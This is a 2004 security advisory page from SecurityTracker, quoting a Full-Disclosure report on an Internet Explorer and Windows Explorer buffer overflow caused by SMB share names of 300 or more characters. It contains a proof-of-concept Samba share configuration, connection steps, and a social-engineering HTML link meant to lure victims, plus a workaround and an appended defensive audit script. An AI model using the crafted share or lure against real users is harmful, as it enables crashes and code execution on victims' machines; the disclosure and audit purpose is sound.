SecurityTracker.com
Category:   Application (Web Browser)  >   Microsoft Internet Explorer (IE)
Vendors:   Microsoft
Microsoft Internet Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1009939
SecurityTracker URL:  http://securitytracker.com/id/1009939
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Apr 26 2004
Original Entry Date:  Apr 26 2004
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in Microsoft Windows Explorer and Internet Explorer. A remote user who controls a network share can cause a target user's browser to crash when the target user connects to that share.

Rodrigo Gutierrez reported that a remote user with control of an SMB share can set a specially crafted share name so that when a target user attempts to connect to the SMB share, the target user's browser will crash or execute arbitrary code.

According to the report, Microsoft ostensibly fixed this flaw in Windows XP SP1 and Windows 2000 SP4 after being notified by Rodrigo Gutierrez in early 2002, as described in the Microsoft KB article 322857:

http://support.microsoft.com/default.aspx?scid=kb;en-us;322857

However, the report indicates that the problem was not properly fixed.

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause a target user's browser to crash or execute arbitrary code when the target user attempts to connect to a malicious SMB share. The arbitrary code will execute with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Boundary error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Date:  Sun, 25 Apr 2004 18:01:53 -0400
Subject:  [Full-Disclosure] Microsoft's Explorer and Internet Explorer long share name buffer overflow.


Fixed Advisory. 
 
Rodrigo Gutierrez.

Attachment: explorer-vuln.txt

Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.



Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>

Affected: MS Internet Explorer, MS Explorer (explorer.exe)
          Windows XP(All), Windows 2000(All), Windows 98(All), Windows Me(All)

Not Tested: Windows 2003

Vendor Status: I notified the vendor at the beginning of 2002; this
               vulnerability was supposed to be fixed in Service Pack 1
               in XP and SP4 in Windows 2000 according to the
               vendor's Knowledge Base article 322857.

Vendor URL: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857



Background.

MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are
core pieces of Microsoft Windows operating systems.



Description

Windows fails to handle long share names when accessing a remote
file server such as Samba, allowing a malicious server to crash the
client's Explorer and eventually get to execute arbitrary code on the
machine as the current user (usually with Administrator rights on Windows
machines).



Analysis

In order to exploit this, an attacker must be able to get a user to connect
to a malicious server which contains a share name equal to or longer than 300
characters.


Test Scenario

Windows won't allow you to create such a long share, but of course Samba
includes the feature ;). After your Samba box is up and running, create a
share in your smb.conf:



#------------ CUT HERE -------------

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung

#------------ CUT HERE -------------


After your server is up, just get to your Windows test box and go to the
start menu > run > \\your.malicious.server.ip., plufff, Explorer will crash
:).

Social Engineering:

<a href="\\my.malicious.server.ip">Enter My 0day sploit archive   l/p:n0ph33r</a>



Workaround.

From your network card settings, disable the Client for Microsoft Networks
until a real fix for this vulnerability is available.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
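Added example (not part of the advisory or of Rodrigo Gutierrez's report): a small Python audit script that applies the 300-character threshold from the Analysis section to a Samba smb.conf, so an administrator can confirm that none of their own servers exposes a share name long enough to trip this client bug. The sample configuration inside the script is constructed, and the threshold comes from the advisory, not from Microsoft.

```python
import re
import sys

# Threshold reported in the advisory's Analysis section: a share name of
# 300 characters or more was enough to crash the Windows client.
ADVISORY_MIN_LEN = 300

# Samba section header: a line of the form [share name]
SECTION_RE = re.compile(r"^\s*\[(.+)\]\s*$")


def parse_share_names(smb_conf_text):
    """Return the share names declared in smb.conf-style text.

    Lines starting with '#' or ';' are comments; [global] holds server
    settings rather than a share, so it is skipped.
    """
    names = []
    for line in smb_conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        match = SECTION_RE.match(stripped)
        if match:
            name = match.group(1).strip()
            if name.lower() != "global":
                names.append(name)
    return names


def find_oversized_shares(smb_conf_text, limit=ADVISORY_MIN_LEN):
    """Return (name, length) for each share whose name is at least limit chars."""
    return [(name, len(name)) for name in parse_share_names(smb_conf_text)
            if len(name) >= limit]


# Constructed sample modelled on the advisory's test share; not a real config.
SAMPLE_SMB_CONF = (
    "[global]\nworkgroup = WORKGROUP\n\n"
    "[public]\npath = /srv/public\nbrowseable = yes\n\n"
    "# constructed long share name, 300 characters\n"
    "[" + "A" * 300 + "]\n"
    "comment = Area 51\npath = /tmp/testfolder\nbrowseable = yes\n"
)

if __name__ == "__main__":
    # Audit the smb.conf named on the command line, or the sample if none.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SMB_CONF
    for name, length in find_oversized_shares(text):
        print("share name of %d chars (limit %d): %s..." % (length, ADVISORY_MIN_LEN, name[:40]))
```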

Copyright 2014, SecurityGlobal.net LLC